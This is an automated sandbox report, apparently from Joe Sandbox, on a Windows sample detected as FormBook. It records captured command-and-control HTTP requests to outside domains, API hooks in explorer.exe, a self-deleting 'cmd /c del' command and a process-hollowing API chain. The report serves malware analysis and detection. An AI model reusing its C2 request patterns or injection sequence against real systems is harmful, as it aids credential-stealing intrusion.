                                        content-type: text/html
                                        content-length: 707
                                        date: Mon, 27 Nov 2023 11:12:32 GMT
                                        server: LiteSpeed
                                        location: https://www.alnawrasalrahhal.com/bp31/?wdR=K48xltk0G0VLCVcp&yzuD_Vc=De6ETpvSJNr0YkBlOa1evZHTiRZW0fGv0LVlBpygzy/UcKoa1AD6rYeri5b5ah2pQQV4
                                        platform: hostinger
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.549725172.67.198.102801028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 27, 2023 12:12:53.755681038 CET222OUTGET /bp31/?yzuD_Vc=dYRoo3nky2kJslTOXyYMUSO6KlsUnF/dNMvaUDa17L1Ra/qERalht2gc+usxG4dP6WW+&wdR=K48xltk0G0VLCVcp HTTP/1.1
                                        Host: www.tqmsn.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 27, 2023 12:12:54.095381021 CET810INHTTP/1.1 520
                                        Date: Mon, 27 Nov 2023 11:12:54 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 15
                                        Connection: close
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p3eOxYbU%2FTkzn4UkeiMyywkR%2Br6Z07wNH1NKRVEC%2Fe4m%2F8dEdnrVym2%2F%2BAoXDYF%2Fq6iSNbgpCuHtQwSZ4WoivEixO7t1zPXnBG%2FWLA8jbvumcwHplH3quiozPZtETW2b"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        X-Frame-Options: SAMEORIGIN
                                        Referrer-Policy: same-origin
                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                        Server: cloudflare
                                        CF-RAY: 82c9f0503c7839b5-IAD
                                        alt-svc: h3=":443"; ma=86400
                                        Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30
                                        Data Ascii: error code: 520


                                        Code Manipulations

                                        Function NameHook TypeActive in Processes
                                        PeekMessageAINLINEexplorer.exe
                                        PeekMessageWINLINEexplorer.exe
                                        GetMessageWINLINEexplorer.exe
                                        GetMessageAINLINEexplorer.exe
                                        Function NameHook TypeNew Data
                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE6
                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE6
                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE6
                                        GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE6

                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:12:09:05
                                        Start date:27/11/2023
                                        Path:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Imagebase:0x600000
                                        File size:793'600 bytes
                                        MD5 hash:E8FC0040E6882E0B9EA0E830B6D74D65
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2071940487.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low
                                        Has exited:true

                                        Target ID:3
                                        Start time:12:09:07
                                        Start date:27/11/2023
                                        Path:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\UgHXEfw1uL.exe
                                        Imagebase:0x470000
                                        File size:793'600 bytes
                                        MD5 hash:E8FC0040E6882E0B9EA0E830B6D74D65
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2121827680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:12:09:07
                                        Start date:27/11/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff674740000
                                        File size:5'141'208 bytes
                                        MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000004.00000002.4547308540.000000000E765000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:5
                                        Start time:12:09:09
                                        Start date:27/11/2023
                                        Path:C:\Windows\SysWOW64\control.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\control.exe
                                        Imagebase:0x9e0000
                                        File size:149'504 bytes
                                        MD5 hash:EBC29AA32C57A54018089CFC9CACAFE8
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4532332199.00000000049C0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4532261427.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4531553483.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:6
                                        Start time:12:09:12
                                        Start date:27/11/2023
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\Desktop\UgHXEfw1uL.exe"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:12:09:12
                                        Start date:27/11/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:11.3%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:0%
                                          Total number of Nodes:161
                                          Total number of Limit Nodes:19
                                          execution_graph 35557 e44960 35558 e44972 35557->35558 35559 e4497e 35558->35559 35561 e44a70 35558->35561 35562 e44a95 35561->35562 35566 e44b80 35562->35566 35570 e44b70 35562->35570 35567 e44ba7 35566->35567 35568 e44c84 35567->35568 35574 e4481c 35567->35574 35572 e44b80 35570->35572 35571 e44c84 35571->35571 35572->35571 35573 e4481c CreateActCtxA 35572->35573 35573->35571 35575 e46010 CreateActCtxA 35574->35575 35577 e460d3 35575->35577 35758 767b851 35760 767b801 35758->35760 35759 767b971 35760->35759 35761 767baa9 12 API calls 35760->35761 35761->35760 35596 767b7f0 35598 767b801 35596->35598 35597 767b971 35598->35597 35600 767baa9 35598->35600 35601 767bacb 35600->35601 35602 767bb65 35601->35602 35611 767c016 35601->35611 35626 767bf89 35601->35626 35635 767bfde 35601->35635 35642 767bf5e 35601->35642 35649 767c310 35601->35649 35653 767bd83 35601->35653 35662 767bdf4 35601->35662 35602->35598 35603 767bbc5 35603->35598 35669 767b1e0 35611->35669 35673 767b1d8 35611->35673 35612 767c035 35615 767bde4 35612->35615 35677 767b048 35612->35677 35681 767b041 35612->35681 35613 767c08f 35613->35615 35685 767af90 35613->35685 35689 767af98 35613->35689 35614 767bf59 35614->35603 35615->35614 35624 767b1e0 WriteProcessMemory 35615->35624 35625 767b1d8 WriteProcessMemory 35615->35625 35693 767b119 35615->35693 35697 767b120 35615->35697 35624->35615 35625->35615 35701 767b2d0 35626->35701 35705 767b2c8 35626->35705 35627 767bde4 35628 767bf59 35627->35628 35631 767b120 VirtualAllocEx 35627->35631 35632 767b119 VirtualAllocEx 35627->35632 35633 767b1e0 WriteProcessMemory 35627->35633 35634 767b1d8 WriteProcessMemory 35627->35634 35628->35603 35631->35627 35632->35627 35633->35627 35634->35627 35637 767bde4 35635->35637 35636 767bf59 35636->35603 35637->35635 35637->35636 35638 767b1e0 WriteProcessMemory 35637->35638 35639 767b1d8 WriteProcessMemory 35637->35639 35640 767b120 VirtualAllocEx 35637->35640 35641 767b119 VirtualAllocEx 35637->35641 35638->35637 35639->35637 35640->35637 35641->35637 35643 767bde4 35642->35643 35644 767bf59 35643->35644 35645 767b120 VirtualAllocEx 35643->35645 35646 767b119 VirtualAllocEx 35643->35646 35647 767b1e0 WriteProcessMemory 35643->35647 35648 767b1d8 WriteProcessMemory 35643->35648 35644->35603 35645->35643 35646->35643 35647->35643 35648->35643 35651 767b041 Wow64SetThreadContext 35649->35651 35652 767b048 Wow64SetThreadContext 35649->35652 35650 767c32c 35650->35603 35651->35650 35652->35650 35709 767b45c 35653->35709 35713 767b468 35653->35713 35664 767bde4 35662->35664 35663 767bf59 35663->35603 35664->35663 35665 767b1e0 WriteProcessMemory 35664->35665 35666 767b1d8 WriteProcessMemory 35664->35666 35667 767b120 VirtualAllocEx 35664->35667 35668 767b119 VirtualAllocEx 35664->35668 35665->35664 35666->35664 35667->35664 35668->35664 35670 767b228 WriteProcessMemory 35669->35670 35672 767b27f 35670->35672 35672->35612 35674 767b1e0 WriteProcessMemory 35673->35674 35676 767b27f 35674->35676 35676->35612 35678 767b08d Wow64SetThreadContext 35677->35678 35680 767b0d5 35678->35680 35680->35613 35682 767b048 Wow64SetThreadContext 35681->35682 35684 767b0d5 35682->35684 35684->35613 35686 767af98 ResumeThread 35685->35686 35688 767b009 35686->35688 35688->35615 35690 767afd8 ResumeThread 35689->35690 35692 767b009 35690->35692 35692->35615 35694 767b120 VirtualAllocEx 35693->35694 35696 767b19d 35694->35696 35696->35615 35698 767b160 VirtualAllocEx 35697->35698 35700 767b19d 35698->35700 35700->35615 35702 767b31b ReadProcessMemory 35701->35702 35704 767b35f 35702->35704 35704->35627 35706 767b31b ReadProcessMemory 35705->35706 35708 767b35f 35706->35708 35708->35627 35710 767b427 35709->35710 35710->35709 35711 767b656 CreateProcessA 35710->35711 35712 767b6b3 35711->35712 35714 767b4f1 CreateProcessA 35713->35714 35716 767b6b3 35714->35716 35751 767c380 35752 767c50b 35751->35752 35754 767c3a6 35751->35754 35754->35752 35755 7679f50 35754->35755 35756 767c600 PostMessageW 35755->35756 35757 767c66c 35756->35757 35757->35754 35717 e4b0f8 35718 e4b107 35717->35718 35721 e4b1f0 35717->35721 35729 e4b1df 35717->35729 35722 e4b201 35721->35722 35723 e4b224 35721->35723 35722->35723 35737 e4b47b 35722->35737 35743 e4b488 35722->35743 35723->35718 35724 e4b21c 35724->35723 35725 e4b428 GetModuleHandleW 35724->35725 35726 e4b455 35725->35726 35726->35718 35730 e4b201 35729->35730 35731 e4b224 35729->35731 35730->35731 35735 e4b488 LoadLibraryExW 35730->35735 35736 e4b47b 2 API calls 35730->35736 35731->35718 35732 e4b21c 35732->35731 35733 e4b428 GetModuleHandleW 35732->35733 35734 e4b455 35733->35734 35734->35718 35735->35732 35736->35732 35738 e4b487 35737->35738 35739 e4b42f GetModuleHandleW 35737->35739 35741 e4b4c1 35738->35741 35747 e4ac40 35738->35747 35740 e4b455 35739->35740 35740->35724 35741->35724 35744 e4b49c 35743->35744 35745 e4b4c1 35744->35745 35746 e4ac40 LoadLibraryExW 35744->35746 35745->35724 35746->35745 35748 e4b648 LoadLibraryExW 35747->35748 35750 e4b6c1 35748->35750 35750->35741 35762 e4d458 35763 e4d49e 35762->35763 35767 e4d628 35763->35767 35770 e4d638 35763->35770 35764 e4d58b 35773 e4cd48 35767->35773 35771 e4d666 35770->35771 35772 e4cd48 DuplicateHandle 35770->35772 35771->35764 35772->35771 35774 e4d6a0 DuplicateHandle 35773->35774 35775 e4d666 35774->35775 35775->35764 35578 767d2e8 35579 767d306 35578->35579 35580 767d310 35578->35580 35583 767d350 35579->35583 35588 767d33b 35579->35588 35584 767d35e 35583->35584 35587 767d37d 35583->35587 35593 767ca90 35584->35593 35587->35580 35589 767d350 35588->35589 35590 767ca90 FindCloseChangeNotification 35589->35590 35592 767d37d 35589->35592 35591 767d379 35590->35591 35591->35580 35592->35580 35594 767d4c8 FindCloseChangeNotification 35593->35594 35595 767d379 35594->35595 35595->35580

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 294 5e3af58-5e3af7d 295 5e3af84-5e3afa1 294->295 296 5e3af7f 294->296 297 5e3afa9 295->297 296->295 298 5e3afb0-5e3afcc 297->298 299 5e3afd5-5e3afd6 298->299 300 5e3afce 298->300 311 5e3b337-5e3b33e 299->311 300->297 300->299 301 5e3b1c3-5e3b1d5 300->301 302 5e3b300-5e3b30c 300->302 303 5e3b125-5e3b13d 300->303 304 5e3b20a-5e3b216 300->304 305 5e3b2a9-5e3b2b5 300->305 306 5e3b069-5e3b075 300->306 307 5e3b009-5e3b00d 300->307 308 5e3b18d-5e3b1a4 300->308 309 5e3b2d3-5e3b2df 300->309 310 5e3b0f0-5e3b0f9 300->310 300->311 312 5e3b0d6-5e3b0eb 300->312 313 5e3b17b-5e3b188 300->313 314 5e3afdb-5e3b007 300->314 315 5e3b1da-5e3b1de 300->315 316 5e3b25a-5e3b27a 300->316 317 5e3b0ba-5e3b0d1 300->317 318 5e3b039-5e3b03d 300->318 319 5e3b27f-5e3b2a4 300->319 320 5e3b23e-5e3b255 300->320 301->298 331 5e3b313-5e3b332 302->331 332 5e3b30e 302->332 321 5e3b144-5e3b15a 303->321 322 5e3b13f 303->322 337 5e3b218 304->337 338 5e3b21d-5e3b239 304->338 323 5e3b2b7 305->323 324 5e3b2bc-5e3b2ce 305->324 333 5e3b077 306->333 334 5e3b07c-5e3b092 306->334 325 5e3b020-5e3b027 307->325 326 5e3b00f-5e3b01e 307->326 362 5e3b1a6 call 5e3b548 308->362 363 5e3b1a6 call 5e3b538 308->363 327 5e3b2e1 309->327 328 5e3b2e6-5e3b2fb 309->328 339 5e3b0fb-5e3b10a 310->339 340 5e3b10c-5e3b113 310->340 312->298 313->298 314->298 335 5e3b1f1-5e3b1f8 315->335 336 5e3b1e0-5e3b1ef 315->336 316->298 317->298 329 5e3b050-5e3b057 318->329 330 5e3b03f-5e3b04e 318->330 319->298 320->298 355 5e3b161-5e3b176 321->355 356 5e3b15c 321->356 322->321 323->324 324->298 343 5e3b02e-5e3b034 325->343 326->343 327->328 328->298 344 5e3b05e-5e3b064 329->344 330->344 331->298 332->331 333->334 358 5e3b094 334->358 359 5e3b099-5e3b0b5 334->359 346 5e3b1ff-5e3b205 335->346 336->346 337->338 338->298 348 5e3b11a-5e3b120 339->348 340->348 343->298 344->298 345 5e3b1ac-5e3b1be 345->298 346->298 348->298 355->298 356->355 358->359 359->298 362->345 363->345
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: "Q/$"Q/$"Q/$'eF9$'eF9$+U$+U
                                          • API String ID: 0-951757884
                                          • Opcode ID: 87b8014cd52102bc9de1d237f92ae8ffcf133b12f17bb26483c24fb2108feab3
                                          • Instruction ID: 3ae55fa274becd95c23be25cfb8b666455204216b2cf85ae9c58ae090b7df982
                                          • Opcode Fuzzy Hash: 87b8014cd52102bc9de1d237f92ae8ffcf133b12f17bb26483c24fb2108feab3
                                          • Instruction Fuzzy Hash: D0C12CB0D15219DFCB04CF95C4868AEFBB2FF88300B14E569E556AB354D734A982CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 364 5e3e9f8-5e3ea9a 371 5e3eac4 364->371 372 5e3ea9c-5e3eaa8 364->372 373 5e3eaca-5e3eb57 371->373 374 5e3eab2-5e3eab8 372->374 375 5e3eaaa-5e3eab0 372->375 382 5e3eb81 373->382 383 5e3eb59-5e3eb65 373->383 376 5e3eac2 374->376 375->376 376->373 384 5e3eb87 382->384 385 5e3eb67-5e3eb6d 383->385 386 5e3eb6f-5e3eb75 383->386 387 5e3eb8a 384->387 388 5e3eb7f 385->388 386->388 389 5e3eb91-5e3ebad 387->389 388->384 390 5e3ebc2-5e3ebc3 389->390 391 5e3ebaf 389->391 392 5e3ed5b-5e3ed62 390->392 393 5e3ebc8-5e3ebcb 390->393 391->387 391->392 391->393 394 5e3ed03-5e3ed04 391->394 395 5e3ed23-5e3ed36 391->395 396 5e3ebf7-5e3ebff 391->396 397 5e3ed3b 391->397 415 5e3ebce call 7671f00 393->415 416 5e3ebce call 7671f10 393->416 411 5e3ed06 call 767c340 394->411 412 5e3ed06 call 767c32f 394->412 395->389 417 5e3ec04 call 76737c8 396->417 418 5e3ec04 call 76737d8 396->418 413 5e3ed3e call 7674978 397->413 414 5e3ed3e call 7674988 397->414 398 5e3ed0c-5e3ed1e 399 5e3ed44-5e3ed56 399->389 400 5e3ebd4-5e3ebf5 400->389 401 5e3ec0a-5e3ec10 421 5e3ec16 call 767435a 401->421 422 5e3ec16 call 7674368 401->422 402 5e3ec1c-5e3ecaf 419 5e3ecb5 call 7671d02 402->419 420 5e3ecb5 call 7671d10 402->420 408 5e3ecbb-5e3ecd4 423 5e3ecd7 call 7670171 408->423 424 5e3ecd7 call 7670178 408->424 410 5e3ecdd-5e3ecfe 410->389 411->398 412->398 413->399 414->399 415->400 416->400 417->401 418->401 419->408 420->408 421->402 422->402 423->410 424->410
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2073582513.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5e30000_UgHXEfw1uL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5 1l$$cq$$cq$$cq$$cq
                                          • API String ID: 0-3438777806
                                          • Opcode ID: 4d363ee842b31ccb2c5fc35bec68befd821a13a5890f33304a074c27fe6c258d
                                          • Instruction ID: b4bb0ddd522a365e859bca24138c41947cb866ddec2c037f1cf0dd3b9e3b7140
                                          • Opcode Fuzzy Hash: 4d363ee842b31ccb2c5fc35bec68befd821a13a5890f33304a074c27fe6c258d
                                          • Instruction Fuzzy Hash: E991A074E11218CFEB64CFA4D995B9DBBB2FB89300F1094AAE44AA7354DB305E85CF11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 425 5e3ae2f-5e3ae31 426 5e3ae33-5e3ae52 425->426 427 5e3ae9a 425->427 429 5e3aea1-5e3aea2 427->429 430 5e3ae9c-5e3ae9d 427->430 431 5e3aea4-5e3aea6 429->431 432 5e3aea9-5e3aeaa 429->432 430->429 433 5e3aea8 431->433 434 5e3aead-5e3aeb0 431->434 435 5e3aeb1-5e3aeb2 432->435 436 5e3aeab-5e3aeac 432->436 433->432 434->435 437 5e3aeb4-5e3aeb6 435->437 438 5e3aeb9-5e3aeba 435->438 436->434 441 5e3aeb8 437->441 442 5e3aebd-5e3aebe 437->442 439 5e3aec1-5e3aec2 438->439 440 5e3aebc 438->440 445 5e3aec3-5e3aec4 439->445 446 5e3aec9 439->446 440->442 441->438 443 5e3aec0 442->443 444 5e3aec5-5e3aec6 442->444 443->439 447 5e3aec8 444->447 448 5e3aecd-5e3aed6 444->448 445->444 446->448 447->446 450 5e3aed8-5e3aed9 448->450 451 5e3aedd-5e3aede 448->451 450->451 452 5e3aee0-5e3aee4 451->452 453 5e3aee5-5e3af00 451->453 452->453 453->436 459 5e3af02 453->459 460 5e3af04-5e3af08 459->460 461 5e3af09-5e3af1a 459->461 460->461 466 5e3af21-5e3af22 461->466 467 5e3af1c-5e3af1e 461->467 468 5e3af24 466->468 469 5e3af29-5e3af2e 466->469 470 5e3af20 467->470 471 5e3af25-5e3af28 467->471 468->471 472 5e3af30-5e3af34 469->472 473 5e3af35-5e3af7d 469->473 470->471 471->469 472->473 478 5e3af84-5e3afa1 473->478 479 5e3af7f 473->479 480 5e3afa9 478->480 479->478 481 5e3afb0-5e3afcc 480->481 482 5e3afd5-5e3afd6 481->482 483 5e3afce 481->483 494 5e3b337-5e3b33e 482->494 483->480 483->482 484 5e3b1c3-5e3b1d5 483->484 485 5e3b300-5e3b30c 483->485 486 5e3b125-5e3b13d 483->486 487 5e3b20a-5e3b216 483->487 488 5e3b2a9-5e3b2b5 483->488 489 5e3b069-5e3b075 483->489 490 5e3b009-5e3b00d 483->490 491 5e3b18d-5e3b1a4 483->491 492 5e3b2d3-5e3b2df 483->492 493 5e3b0f0-5e3b0f9 483->493 483->494 495 5e3b0d6-5e3b0eb 483->495 496 5e3b17b-5e3b188 483->496 497 5e3afdb-5e3b007 483->497 498 5e3b1da-5e3b1de 483->498 499 5e3b25a-5e3b27a 483->499 500 5e3b0ba-5e3b0d1 483->500 501 5e3b039-5e3b03d 483->501 502 5e3b27f-5e3b2a4 483->502 503 5e3b23e-5e3b255 483->503 484->481 514 5e3b313-5e3b332 485->514 515 5e3b30e 485->515 504 